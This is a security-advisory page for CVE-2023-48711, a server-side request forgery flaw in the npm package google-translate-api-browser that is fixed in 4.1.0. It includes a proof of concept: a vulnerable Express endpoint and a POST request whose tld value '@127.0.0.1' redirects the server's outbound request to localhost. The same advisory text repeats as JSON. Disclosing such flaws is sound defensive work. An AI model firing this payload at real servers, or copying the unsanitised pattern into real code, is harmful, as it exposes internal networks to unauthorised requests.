GHSA-4233-7Q5Q-M7P6

Vulnerability from github – Published: 2023-11-27 23:30 – Updated: 2023-11-27 23:30
VLAI
Summary
google-translate-api-browser Server-Side Request Forgery (SSRF) Vulnerability
Details

Summary

A Server-Side Request Forgery (SSRF) Vulnerability is present in applications utilizing the google-translate-api-browser package and exposing the translateOptions to the end user. An attacker can set a malicious tld, causing the application to return unsafe URLs pointing towards local resources.

Details

The translateOptions.tld field is not properly sanitized before being placed in the Google translate URL. This can allow an attacker with control over the translateOptions to set the tld to a payload such as @127.0.0.1. This causes the full URL to become https://translate.google.@127.0.0.1/..., where translate.google. is the username used to connect to localhost.

PoC

Imagine a server running the following code (closely mimicking the code present in the package's README):

const express = require('express');
const { generateRequestUrl, normaliseResponse } = require('google-translate-api-browser');
const https = require('https');

const app = express();
app.use(express.json());

app.post('/translate', async (req, res) => {
    const { text, options } = req.body;

    const url = generateRequestUrl(text, options);

    https.get(url, (resp) => {
        let data = '';

        resp.on('data', (chunk) => {
          data += chunk;
        });

        resp.on('end', () => {
            res.json(normaliseResponse(JSON.parse(data)));
        });
      }).on("error", (err) => {
        console.log("Error: " + err.message);
      });
});

const port = 3000;
app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});

An attacker can then send the following POST request to /translate:

POST /translate HTTP/1.1
Host: localhost:3000
Content-Type: application/json
Content-Length: 51

{"text":"Hello","options": {"tld": "@127.0.0.1"}  }

This will cause a request to be sent to the localhost of the server running the Node application.

Impact

An attacker can send requests within internal networks and the local host. Should any HTTPS application be present on the internal network with a vulnerability exploitable via a GET call, then it would be possible to exploit this using this vulnerability.

Severity
3.7 (Low)
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "google-translate-api-browser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-48711"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-27T23:30:14Z",
    "nvd_published_at": "2023-11-24T17:15:07Z",
    "severity": "LOW"
  },
  "details": "### Summary\nA Server-Side Request Forgery (SSRF) Vulnerability is present in applications utilizing the `google-translate-api-browser` package and exposing the `translateOptions` to the end user. An attacker can set a malicious `tld`, causing the application to return unsafe URLs pointing towards local resources.\n\n### Details\nThe `translateOptions.tld` field is not properly sanitized before being placed in the Google translate URL. This can allow an attacker with control over the `translateOptions` to set the `tld` to a payload such as `@127.0.0.1`. This causes the full URL to become `https://translate.google.@127.0.0.1/...`, where `translate.google.` is the username used to connect to localhost.\n\n### PoC\nImagine a server running the following code (closely mimicking the code present in the package\u0027s README):\n```javascript\nconst express = require(\u0027express\u0027);\nconst { generateRequestUrl, normaliseResponse } = require(\u0027google-translate-api-browser\u0027);\nconst https = require(\u0027https\u0027);\n\nconst app = express();\napp.use(express.json());\n\napp.post(\u0027/translate\u0027, async (req, res) =\u003e {\n    const { text, options } = req.body;\n\n    const url = generateRequestUrl(text, options);\n\n    https.get(url, (resp) =\u003e {\n        let data = \u0027\u0027;\n      \n        resp.on(\u0027data\u0027, (chunk) =\u003e {\n          data += chunk;\n        });\n      \n        resp.on(\u0027end\u0027, () =\u003e {\n            res.json(normaliseResponse(JSON.parse(data)));\n        });\n      }).on(\"error\", (err) =\u003e {\n        console.log(\"Error: \" + err.message);\n      });\n});\n\nconst port = 3000;\napp.listen(port, () =\u003e {\n  console.log(`Server is running on port ${port}`);\n});\n```\n\nAn attacker can then send the following POST request to `/translate`:\n```\nPOST /translate HTTP/1.1\nHost: localhost:3000\nContent-Type: application/json\nContent-Length: 51\n\n{\"text\":\"Hello\",\"options\": {\"tld\": \"@127.0.0.1\"}  }\n```\n\nThis will cause a request to be sent to the localhost of the server running the Node application.\n\n### Impact\nAn attacker can send requests within internal networks and the local host. Should any HTTPS application be present on the internal network with a vulnerability exploitable via a GET call, then it would be possible to exploit this using this vulnerability.\n",
  "id": "GHSA-4233-7q5q-m7p6",
  "modified": "2023-11-27T23:30:14Z",
  "published": "2023-11-27T23:30:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cjvnjde/google-translate-api-browser/security/advisories/GHSA-4233-7q5q-m7p6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48711"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cjvnjde/google-translate-api-browser/commit/33c2eac4a21c6504409e7b06dd16e6346f93d34b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cjvnjde/google-translate-api-browser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "google-translate-api-browser Server-Side Request Forgery (SSRF) Vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.